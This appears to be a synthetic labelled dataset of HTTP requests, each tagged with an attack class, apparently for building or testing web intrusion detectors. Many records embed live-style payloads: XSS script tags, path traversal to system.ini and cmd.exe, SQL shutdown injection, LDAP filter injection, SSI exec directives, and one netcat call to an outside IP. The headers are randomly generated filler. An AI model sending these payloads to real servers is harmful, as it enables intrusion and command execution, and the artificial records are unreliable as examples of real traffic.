~~~~~: ~~~~~~~~~~~~

null

End - Id: 49116
Start - Id: 46803
class: XSS
PUT /0yTN/i3pmsi/usincludeMlibj.mspx? HTTP/1.0
Content-Length: 90
Content-Language: f,e
Content-Encoding: identity
Content-Location: http://eaoda.com/kenEa/suoet/nwrtId.gz
Content-MD5: b2V5ZGFldW9oN2h0bmxuNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 03:06:46 UTC
Last-Modified: Mon, 07 Jan 08 21:38:21 UTC
Host: 190.57.125.55
Connection: bonGsaj
Accept: audio/x-wav;q=0.7, video/mpeg;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.6, deflate, identity
Accept-Language: *;q=0.1
Cache-Control: max-age=25
Client-ip: 163.182.220.152
Cookie: sufd=koRu4he
Cookie2: $Version="55"
Date: Mon, 04 Jan 10 16:55:35 GMT
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: 100-continue
From: he2rmeQu@ialstesjs.st
If-Modified-Since: Sun, 25 Dec 05 08:20:21 UTC
If-Unmodified-Since: Wed, 01 Feb 06 19:54:53 UTC
If-Match: "yCAS1H9xhaTvrLyDOYnr"
If-None-Match: *
If-Range: Tue, 20 Dec 05 19:10:32 GMT
Max-Forwards: 5905
MIME-Version: 9.6
Pragma: NrEoA='tmgo'
Proxy-Authorization: oand kioW=rs9ay
Authorization: pHir errlaW5a=wzth
Range: 15-86
Referer: /csipat9t.js
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: ueHt/8.7
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: compress
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mLsnennR3neLrc=7500147&sjag=&<script  >[alert ('ad');]</script >

End - Id: 46803
Start - Id: 45348
class: PathTransversal
GET /tuewennslxd/boot.iniMzJY2/olrmeblhohlC.php?da6EWcfqae=+&zhyxgceh02ndl=kscripttceaneoetu HTTP/1.0
Host: 168.216.33.196:80
Connection: close
Accept: audio/x-wav, image/gif
Accept-Charset: iso-8859-3;q=0.4
Accept-Encoding: deflate;q=0.1, identity, gzip, compress
Accept-Language: t0iost-ne7eetc;q=0.4, lonsrk-p7tm3eoi;q=0.8, eopg-ieon;q=0.1, 3u5C-d
Cache-Control: max-stale=5
Client-ip: 129.219.205.161
Cookie: nmOifwai=084430;gsawursoeaso=..\..\..\..\..\..\WINNT\system.ini;ta5ceId=3021368
Date: Sun, 25 Jan 04 09:01:20 GMT
If-Modified-Since: Wed, 08 Jul 09 12:22:40 UTC
If-Unmodified-Since: Sun, 15 Apr 07 17:00:27 CET
If-None-Match: *
Max-Forwards: 921
Referer: /sAttshie/EltrtNtc/jzMpe.msf
TE: chunked
Trailer: Warning
User-Agent: Mozilla/8.8 (X11; U; Linux i586 2.2; lk-7j; rv:1.3.1) Gecko/37604337
Via: HTTP/9.4 www.0jsrZ.gif:8, 2.2 243.59.12.35, FTP/0.6 www.Ttagier.css:7912
Transfer-Encoding: deflate
Upgrade: oles1e/7.6, Gcln/2.9
----: -------------------------------------

null

End - Id: 45348
Start - Id: 38372
class: LdapInjection
GET /eMFFNMe.h/HsoucYfymoRu/RViX/hBnp@TNR8A_NGrl@iFPK/QvHJ/qrceiocresr5lo2slaE/captr/xdTf3jMWIwD/hoehnnnupikmrstv/dadr/vzPPDJdKmA6oicFNRox.dll?azvj=rVMzURxb2M&2ms5lgenienoL=hw3egaeh&cTlinkw8UyD9O=Tsmtos7haonq0l2yf&jK_E=%29+++%28++++%7C++++%28+cn%3D*o%27brien*%29%28mail++++%3D*o+%27brien*%29&oirhldhqi=2553&tutbhshaee=6716034&tpeaeeehsrait=ii%40u+r%5Cfrsunns&tynfdrcgl=41&soow15xWoerU4f=rbDuohioasy&JMvab=0211199&heebulnz6trw=naiieFjnl HTTP/1.1
Host: 208.235.68.11
Connection: d3ndfo5o
Accept: text/*
Accept-Charset: iso-2022-kr;q=0.1, iso-8859-4;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 41.189.98.25
Cookie: 9wcadod=?h-:-1holeyyzh
Cookie2: $Version="9"
Date: Fri, 25 Mar 05 08:39:59 GMT
ETag: "_tbcCy0@wz8M8jd"
Expect: hteo
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Sat, 25 Apr 09 10:38:37 GMT
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 8
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: /iTlno/ihgl/anneemc.asmx
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: N25eernmir/6.3.8.6
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6897x261
Via: FTP/8.6 www.hvo5n.gif, baibtc/9.7 139.26.137.7
Transfer-Encoding: deflate
Upgrade: o1jc/2.3, igt/0.7, Hce/5.3, re9/4.3
Warning: 144 www.enoipEi.htm "wtoi" 
X-Forwarded-For: 0.127.43.146
X-Serial-Number: 9579642646846
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38372
Start - Id: 41927
class: SqlInjection
GET /atoantgtqnr0iTlkmfce/rn3eeeeelndesTSeeOe/z@@y-0NDHP/leisottEao/tfM/tLWra63CG5eNEeF/2ToOlLeniuhJra/letteoefniX.php3?tlho2d2e3e=aX-_QwOi&CNA0=%27%3B+++++shutdown--&I1myleOtcssl=kRcAeT HTTP/1.1
Host: www.vn3inAwoa.com
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: 5nca7uq-wecc, soomrr-id8Krl;q=0.0, cilproir-hm1Nhard;q=0.7, sraatmml-o
Cache-Control: no-transform
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Sat, 17 Nov 07 14:41:07 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: uedR4wh@iydiiAh.st
If-Modified-Since: Wed, 04 May 05 11:11:53 UTC
If-Unmodified-Since: Sat, 22 Jan 05 18:09:20 UTC
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 772
MIME-Version: 8.6
Pragma: Tertaen='tE'
Proxy-Authorization: Digest response="db02e31B81f2C3Ca2dDabA9e0D0Df81F"
Authorization: Digest qop=auth
Range: -0
Referer: http://www.cretJlux.gov/npdeha/aewm.tar.gz
TE: trailers,chunked,chunked
Trailer: If-Range
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 7.0; ue-aw; rv:0.6.0) Gecko/46436359
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1720x8487
Via: FTP/5.7 223.170.21.181, 9.8 15.19.178.124, 3.9 15.184.144.16
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41927
Start - Id: 47570
class: XSS
GET /tibs11T/uxtLy.wC6wX/thnhSgalrys/oa6ttD/smg3epriynsEtEh/AorrTftpj/ibmnnRaajntg.png?e8teohrweu=rernwS&tk=e9Fvz3iNHdjZ&satcnnn8llr=%3Cdiv++style+++%3D%22behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.ones.com%2Fscript%2Fi6l5ns.msf%5D%29%3B++++%22++++%3E&x7dtte=bcrt6mtplrhf&FPunionlikenph-=ecmdlaL&masock_stream-a=oienb5omsjlQNbsgE&O8X6gnogO=f-f08K63J&kLe=Arcsa&hlqfoesfrhw=57 HTTP/1.0
Host: www.esserD0ie6.gov
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.1
Accept-Encoding: identity, deflate, deflate
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 118.106.166.150
Cookie: ttkaq=501;aanEt5ewhdh9=3
Cookie2: $Version="36"
Date: Tue, 30 Mar 10 18:36:29 CET
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Fri, 08 Jan 10 20:50:19 GMT
If-Unmodified-Since: Fri, 25 Nov 05 17:07:58 CET
If-Match: "MT_hlNFibHJQceJx"
If-None-Match: *
If-Range: *
Max-Forwards: 210
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 946-214738,54330-8
Referer: /btuir.php
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: gegItubese/5.0.3.5
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 684x889
Via: mnozd/9.6 www.t1tz.gif, e0ey/4.6 www.aY6wvi.htm, FTP/9.9 www.mroWrSo9.js
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47570
Start - Id: 41603
class: SqlInjection
GET /ettundtrdiRtauefsN/9efc/oVIFnQRlUHc/onoi3n/bts9l/dhDbfR.msf?rtocYeeQ=%27select+customer_phone+++++%27%7C%7C%27from+++++customers++++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27+++++and++++customer_type%3D1%27%3B&hu=t8nyBdn%40rk HTTP/1.0
Host: www.Wynbbitjn.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.7, x-mac-arabic;q=0.9
Accept-Encoding: gzip;q=0.2, identity;q=0.7, deflate, gzip;q=0.9
Accept-Language: bAnx-piwa, lwtg-Iuadtt;q=0.6
Cache-Control: max-age=08
Client-ip: 66.83.180.190
Cookie: Yc9mAsuin2ens=lSgaery;efsoaiioe=0ces;g9n6TmodewrRu=91384;EkscriptyoG1G-Iez=h scvxtrhg
Cookie2: $Version="7"
Date: Wed, 03 Mar 10 13:52:47 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: eimuyt@enr2so.ch
If-Modified-Since: Fri, 02 Nov 07 15:38:46 UTC
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "D5yB_91ZKfigvC9u"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: "egzvQJG3T5@HMmK"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Basic b0huZWlZcmE6Z29oNzg=
Range: 9034-
Referer: /Grweea/tecm5.exe
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: HmijacObil7nQ
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: identity
Upgrade: trb/4.5, yanm/8.8, z8b/3.1
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41603
Start - Id: 36480
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 53.119.199.185
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: euc-cn
Accept-Encoding: *;q=0.7
Accept-Language: noblue-rd6g5s5, y-n;q=0.2, srwhfEN-er2In60, pqii6v-eB;q=0.0
Cache-Control: min-fresh=723
Client-ip: 221.93.140.194
Cookie: h9fuc5lhimbaic=500497;Cwo4tea1r1sms=eAorrrnhrIrrnmxepf;d5r1vgaCa=r;pzTgQhttpi=h&;yneg1H=ae8ro;rserlroa=varr sh 7 inodevchilda'lib
Cookie2: $Version="877"
Date: Sat, 17 Feb 07 23:31:10 GMT
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Fri, 02 Jan 09 04:51:22 CET
If-Unmodified-Since: Fri, 25 Feb 05 15:09:57 UTC
If-Match: *
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 5
MIME-Version: 9.8
Pragma: r='1dAraae'
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 998505-,-0540,815-
Referer: http://iat8i1.net/oovinl.ace
TE: gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/8.9 (compatible; rbtn; Open BSD i586; 5ltisc8; aU9aTtfsco; 0ttvecy)
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: FTP/2.3 212.152.123.184:9654
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36480
Start - Id: 38265
class: LdapInjection
GET /ak/eol/gnv/p4vw4.aspx?eteg7=%5C%3Df7oa7whereke++oer&ehdanTSowr=6cH&eeotshcmfat3dol=e3nltt+p%3BnHrP0union&OfCojiPv=72&rcj4atetr=rp1feibtltomn8&eqjTcsn3=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&tcet=5y4etcyg1ebtoaurF&rkf0nlniranset=yIOz%40ot39wGQ&Oodeatht=wSXTI HTTP/1.0
Host: 8.53.76.35
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: u='A'
Client-ip: 15.226.84.79
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="99"
Date: Wed, 26 Mar 08 06:47:29 CET
ETag: "RtXlyZgjYG5n60XYwM"
Expect: ftes
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 18 Sep 07 19:50:01 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: "_F7jI7B@ofzhw1kB"
If-Range: Fri, 29 Oct 04 05:09:26 UTC
Max-Forwards: 0567
MIME-Version: 2.2
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest username="pneDogep"
Range: 97538-,1799-
Referer: http://www.tabcesi.it/seustw.mspx
TE: chunked,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 7.9; ah-sl; rv:0.7.6) Gecko/87420310
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: deflate
Upgrade: tme6o5/8.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38265
Start - Id: 36764
class: OsCommanding
GET /hWKgX.bQ.qfEWwoh/MLAS5qX6a/Fcqcnlmts/8VEC8u_kN0taF/re9b/gI3xCWS3@FCw4j/hsh86Dho/ms3Uw1accept2AKZ.css?qaebaooe=9st&obpce=1oCtsdfNp7ii&aeh9dIo=i2A3K8ZE&eexUwzenb3tcpad=uVn.oQOn&nee9oNye=%7C%2Fusr%2Fbin%2Fnc++++-vvv++++57.254.25.250+80%2500&gdJconnectnodeBQ=ns%26+dhldhnetcatac%24nn&wkoi7a6oorfh=nwIzDtjwOQq&eSlaote=quenyeymochaao&yl1TscriptZYW0LmailC=ioo%2Flaimgmt%3E%25documentxterm%7Cx HTTP/1.1
Host: 198.215.11.161
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 175.79.197.116
Cookie: efsltbp=script;ndeir9eai=trg;nstotji=rnPqXr1s;sn5=op9e;97y91ct=dI
Cookie2: $Version="22"
Date: Tue, 19 Feb 08 05:45:58 UTC
ETag: "MpUqDGRGH053tTfJnn4"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Fri, 09 Apr 04 23:57:10 GMT
If-Unmodified-Since: Wed, 20 Aug 08 13:49:26 CET
If-Match: *
If-None-Match: "7NQqlCsCJdnmy4vhaTIR"
If-Range: "@-Dl8F_liWDXHHnRtky"
Max-Forwards: 574
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: Basic cmd0b2xub2U6ak5ocjhsZQ==
Range: 8-,6-50
Referer: /drhxe/sdln/oier/r2ysiq7/hofpirna.bin
TE: trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 2.1; iy-gr; rv:8.2.2) Gecko/26621848
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: deflate
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 467 198.228.130.90 "bMeblOdle" 
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36764
Start - Id: 37350
class: LdapInjection
GET /a3U/9JaSeu./teo5j33iigeastb9iiEh/eAs5LNz7WqY/nM@i2IZFyKXKVL.jpg?o0vonIka=oYh&6n2T=rnetx&Neo=rNjIh&_.MPtWx3ow7Z=%3F%24vbscript1s%251dqoofcfiri+null&IbetweenI8=98105348&i0ti=n1%2FZwmcpr&SC4COperl_=49255&Bothui=%28Td&Tbhd=56983&e5ha8yTrGaCh=6367945 HTTP/1.1
Host: www.hae1i3tasi.cz:80
Connection: oE9w
Accept: application/*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.9, iso-8859-5, ks_c_5601-1987
Accept-Encoding: identity, deflate
Accept-Language: f5)(&(objectClass=    uw*)
Cache-Control: max-stale=24941
Client-ip: 216.207.233.187
Cookie: TSrRhfupf=If= Gseval;n:vlIas;hervL5d=wherenf4 and m]tmpawehI;28paMu18a=8ee(qi'v9s3e;ci87idbuo=retood9nuEiy;elefiilrsle=ie5ixwpahttpseah
Cookie2: $Version="66"
Date: Thu, 10 Apr 08 22:20:03 CET
ETag: W/"qgpf_ZNuYqhia_f."
Expect: 100-continue
If-Modified-Since: Mon, 18 Sep 06 05:59:03 GMT
If-Unmodified-Since: Sun, 14 Aug 05 17:34:52 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Aug 06 16:40:29 GMT
Max-Forwards: 8
Pragma: 5aeod=ln
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: Basic THVzcjpxZmxwVGV3cg==
Referer: http://t8aa.net/ivftw/ptri/eo2h.asp
Trailer: If-None-Match
User-Agent: sihsdse/8.0.1.7
UA-Disp: 826,0920,16
UA-Pixels: 5121x090
Via: HTTP/8.9 23.229.197.36, FTP/6.5 176.230.115.111
Transfer-Encoding: deflate
Upgrade: ii2/4.4, roa/1.5
X-Serial-Number: 3225774785
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37350
Start - Id: 35017
class: SSI
GET /lr1Eraeu2/xJijbcaNA_lm/ulosjsYd/tb4Rb_a-Vf34kwYI1E1/ndas2ueB/7eu2untsNt/ltfi3oUbwesEnwinj3gd/rl/nPUbixmlWyiFTbetweenS/iw6/7T28cadwp-T2stdinQIformj/lSWR4xW7.pl?oAtt8TXpl=positiontezyge%2Fleex+ni&mLkB4QBacopy=iT+sa4tmpt&lnudge=hudmbvejwtrkl&wtrin6s=s+n&rB5lRXP=30601&vetcc-2L=9821491&thtEupmhDlh=tqsilu&hNs=eyR&elhoustiE=8zhtpassdg&YBRdZiVCrW5b=e%3B9eJo%28l%7Eh%3AcsEt&AabiopilNn=adeletefromtx&onpfl2wPr=%3C%21--++++%23odbc++++connect%3D%22hojkams%2CMs%2Csu1i%22+++++++statement%3D%22select++++*+++++from+++vmr%22--%3E&ddso=kfrs&EW5S.xHoscriptaccept=36159 HTTP/1.0
Host: www.rrE1d.fr:80
Connection: Fhnntt
Accept: application/*, application/postscript
Accept-Charset: *
Accept-Language: kR-apgo
Cache-Control: max-age=16
Date: Wed, 25 Oct 06 13:42:30 GMT
ETag: "6T@_ssI26q1c9462KyOx"
Expect: 100-continue
If-Modified-Since: Mon, 25 Jun 07 10:49:35 UTC
If-Unmodified-Since: Thu, 17 Aug 06 16:49:08 CET
If-Match: *
Pragma: o81eyca='n'
Referer: http://eexem7i.cz/tspbzl.zip
Trailer: Via
User-Agent: aACpKl http://www.137emsc9.ch
Via: 8.6 www.a1sr.css
Warning: 670 90.192.133.231 "telxe" 
----: -----------------------------

null

End - Id: 35017
Start - Id: 39471
class: SSI
PUT /wAxzottE/7hNts/nAbU60tF/VtmpJFOn-dY/Eoioe3/ePCIDSa@fRB95G9EJPm/noeac/hgjp/ow4/raoh3.msf? HTTP/1.0
Content-Length: 224
Content-Language: lnn
Content-Encoding: compress
Content-Location: http://vGrip1dl.fr/Noms/lIt9/llrT/daneala/jseeUdi.pl
Content-MD5: anRpbm9iZGVsblQ0ZGFwbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 13 Jan 09 12:24:31 GMT
Host: 250.170.189.34
Connection: fluS
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: <!-- #exec    cgi="/cgi-bin/script?lwomlsr"   -->
Cache-Control: no-transform
Client-ip: 52.74.214.142
Date: Sun, 01 May 05 07:51:38 CET
Expect: 100-continue
From: zO5ldjrt@WIls.cz
If-Modified-Since: Tue, 10 Jun 08 03:43:18 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:47:25 CET
If-Match: "4tUhl.@ZykD3z7Z"
If-Range: "eUBKF3H5UHgaN1xabUxc"
Max-Forwards: 364
Pragma: no-cache
Authorization: lgnId auko43=Swctiz
Referer: /1ataeeoo/uoqire/aneilyiE.jpg
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 3.5; yp-b3; rv:4.9.2) Gecko/13340156
UA-Pixels: 8114x0121
Via: 2.7 1.56.154.87, otTeo/7.9 www.8senle.html, 7.0 21.183.246.145
----: ----------------

steF=mle3aifsa&vnuNm8E=ice&sst=tetelike nOrdh\&nksl=964923225&th8os=lw&Aliblexec6object=ao&e1ntloeNoe=eo&em5aUa1ykorsS=susrhbeab8&cpFoP9Yo=NaSxsgIaroe&utihiEal=dp ipm>abinc&WsveguhiPRorRse=eU&JnvARO.tsK=kd9b3Vy&0tur=go1c

End - Id: 39471
Start - Id: 36911
class: LdapInjection
PUT /d3hmg9mqvoYp8o/Fyhtacces/c.V.gif? HTTP/1.1
Content-Length: 168
Content-Language: aoysa,8ug,oeexo
Content-Encoding: compress
Content-Location: /Eme8ccn/bsipLio/att7ppcr/tdn9lal.mpeg
Content-MD5: MXNubXJxNXRwem5paWVjTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Aug 09 07:37:56 UTC
Last-Modified: Fri, 15 Sep 06 05:55:14 GMT
Host: 143.242.193.159
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.4, identity;q=0.5, compress
Accept-Language: tCS-lnehelr;q=0.9, tOnoix-dem6;q=0.1, nhbRen-Aoser, ihhasir-rglc6un;q=0.0, es-baop;q=0.6
Cache-Control: max-age=557
Client-ip: 20.129.129.141
Cookie: b8pe2ihuedoejad=iJDXhAW
Cookie2: $Version="8"
Date: Sat, 09 Oct 04 13:19:56 CET
ETag: "JjZImyztplyA4.bN-Dt"
Expect: t7eiih=1zBcuhe;elVew
From: dhafadn@folsiatle.com
If-Modified-Since: Mon, 21 Jul 08 15:22:01 UTC
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: "GZpYr7Gb9XAzLVawwG3B"
If-None-Match: "p1@iPkWAkq9Qno3LQVw2"
If-Range: *
Max-Forwards: 18
MIME-Version: 8.8
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest username="snspsns"
Range: 03-
Referer: http://www.nciyadm.biz/emnod8o.asp
TE: trailers
Trailer: Warning
User-Agent: ilHgigs7l6yncair7brj
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: HTTP/1.7 26.146.183.19
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nyw73fsn=199&5acorzomelYet=aot&swlew2wfrom=rd mqah3fromxp_0&wtr3t1epwp1=1448&snistshe=rnoihrosey=/o&m7oN=)  (|    (po=nA*)&rc7tzz8l6smnzdd=Lnt9includedt

End - Id: 36911
Start - Id: 44040
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 81.167.255.22
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 199.92.23.73
Cookie: iLatApTcot=26621;a2eOorjns=ltelnet2o5;rideY9=otehOi;msdEioterai4onM=Rioos;xre5fhaieaamE=/e/j ata
Cookie2: $Version="4"
Date: Tue, 26 Dec 06 02:25:37 GMT
ETag: "eRN9igiQRHhLenNQ"
Expect: ehwes=nuc4cz
From: fasutm@u0PGri.cz
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 10 Jul 08 06:11:38 GMT
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Wed, 14 Nov 07 05:18:52 UTC
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic YWtFd25wOmtoYW8=
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /0lthe/iOsE6.cgi
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/7.4 (compatible; oqaoi; Win98; nsshhmaeja; sdle3t)
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 695x429
Via: FTP/1.1 133.226.155.4, 7.6 www.ueef.css:76
Transfer-Encoding: identity
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44040
Start - Id: 40278
class: SSI
GET /i1SSsoen5dseuo/yftkfmnxhent/ew.UCggNOUJ/dmitotteaeoleu/iGLU3JXk/a6PXlVzH1XRM7sgUWrV0/f-DjrM.jpeg?5jfs4d4=%3C%21--+++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5CH0%5Cbogsoil%5C8u.exe+++++d%3A%5CieoAtqrrrA%5Cwww.reorenel.org%5Ca6ondihaM%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E HTTP/1.0
Host: www.tinHaIrolu.uk
Connection: keep-alive
Accept: text/*, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: 
